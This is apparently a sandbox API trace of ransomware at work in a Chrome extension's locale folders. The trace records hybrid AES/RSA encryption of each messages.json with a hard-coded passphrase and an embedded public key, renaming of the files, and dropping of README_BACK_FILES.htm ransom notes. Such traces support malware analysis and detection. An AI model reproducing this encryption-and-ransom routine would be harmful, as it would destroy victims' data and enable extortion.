GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0247.953] GetLastError () returned 0x0 [0247.953] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json")) returned 0x20 [0247.953] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json", dwFileAttributes=0x80) returned 1 [0247.954] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0247.954] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0247.954] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0247.955] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0247.957] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0247.957] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0247.957] CryptHashData (hHash=0x2938978, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.957] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0247.957] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.957] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0247.957] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293a1e0) returned 1 [0247.958] CryptImportPublicKeyInfo (in: hCryptProv=0x293a1e0, dwCertEncodingType=0x1, pInfo=0x292f530*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292f560*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292f568*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29371f8) returned 1 [0247.958] CryptEncrypt (in: hKey=0x29371f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0247.958] CryptEncrypt (in: hKey=0x29371f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293a268*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293a268*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0247.958] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293a268*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293a268*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0247.959] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdd, lpOverlapped=0x0) returned 1 [0247.960] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdd, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0247.960] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0247.961] CloseHandle (hObject=0x5d58) returned 1 [0247.961] CloseHandle (hObject=0x5d5c) returned 1 [0247.962] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json"), bFailIfExists=0) returned 1 [0247.965] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json", dwFileAttributes=0x0) returned 1 [0247.966] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.gsg")) returned 1 [0247.967] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.fuck")) returned 1 [0247.968] CryptDestroyHash (hHash=0x2938978) returned 1 [0247.968] CryptDestroyKey (hKey=0x2938af8) returned 1 [0247.968] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0247.968] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0247.968] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0247.968] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\readme_back_files.htm")) returned 0xffffffff [0247.968] AreFileApisANSI () returned 1 [0247.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0247.968] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.968] GetFileType (hFile=0x5d50) returned 0x1 [0247.969] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0247.970] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.970] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0247.970] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.970] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.970] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0247.970] GetLastError () returned 0x0 [0247.970] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json")) returned 0x20 [0247.970] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json", dwFileAttributes=0x80) returned 1 [0247.971] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0247.971] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0247.972] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0247.972] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0247.975] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0247.975] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0247.975] CryptHashData (hHash=0x29387f8, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.975] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0247.975] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.975] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0247.975] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293bbe8) returned 1 [0247.976] CryptImportPublicKeyInfo (in: hCryptProv=0x293bbe8, dwCertEncodingType=0x1, pInfo=0x292fa10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292fa40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292fa48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936ff8) returned 1 [0247.976] CryptEncrypt (in: hKey=0x2936ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0247.976] CryptEncrypt (in: hKey=0x2936ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293bc70*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293bc70*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0247.976] WriteFile (in: hFile=0x5d58, lpBuffer=0x293bc70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293bc70*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0247.977] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd6, lpOverlapped=0x0) returned 1 [0247.978] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0247.978] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0247.978] CloseHandle (hObject=0x5d5c) returned 1 [0247.979] CloseHandle (hObject=0x5d58) returned 1 [0247.983] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json"), bFailIfExists=0) returned 1 [0247.987] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json", dwFileAttributes=0x0) returned 1 [0247.988] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.gsg")) returned 1 [0247.989] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.fuck")) returned 1 [0247.991] CryptDestroyHash (hHash=0x29387f8) returned 1 [0247.991] CryptDestroyKey (hKey=0x2938af8) returned 1 [0247.991] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0247.991] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0247.991] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0247.991] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\readme_back_files.htm")) returned 0xffffffff [0247.991] AreFileApisANSI () returned 1 [0247.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0247.992] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.992] GetFileType (hFile=0x5d50) returned 0x1 [0247.992] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0247.993] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.993] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0247.997] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.997] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.997] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0247.997] GetLastError () returned 0x0 [0247.998] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json")) returned 0x20 [0247.998] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json", dwFileAttributes=0x80) returned 1 [0247.998] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0247.999] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0247.999] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.000] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.002] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.002] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.002] CryptHashData (hHash=0x2938af8, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.002] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938af8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938978) returned 1 [0248.003] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.003] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.003] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 